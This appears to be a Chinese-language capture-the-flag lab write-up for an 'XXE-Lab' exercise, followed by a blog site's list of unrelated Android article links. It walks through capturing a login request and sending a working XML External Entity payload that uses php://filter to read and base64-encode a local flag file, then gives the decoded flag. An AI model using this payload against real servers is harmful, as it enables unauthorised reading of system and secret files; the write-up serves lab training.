XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

复制代码
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
哲科软件3 小时前
跨平台开发的抉择:Flutter vs 原生安卓(Kotlin)的优劣对比与选型建议
android·flutter·kotlin
jyan_敬言9 小时前
【C++】string类(二)相关接口介绍及其使用
android·开发语言·c++·青少年编程·visual studio
程序员老刘10 小时前
Android 16开发者全解读
android·flutter·客户端
福柯柯11 小时前
Android ContentProvider的使用
android·contenprovider
不想迷路的小男孩11 小时前
Android Studio 中Palette跟Component Tree面板消失怎么恢复正常
android·ide·android studio
餐桌上的王子11 小时前
Android 构建可管理生命周期的应用(一)
android
菠萝加点糖11 小时前
Android Camera2 + OpenGL离屏渲染示例
android·opengl·camera
用户20187928316711 小时前
🌟 童话:四大Context徽章诞生记
android
yzpyzp11 小时前
Android studio在点击运行按钮时执行过程中输出的compileDebugKotlin 这个任务是由gradle执行的吗
android·gradle·android studio
aningxiaoxixi11 小时前
安卓之service
android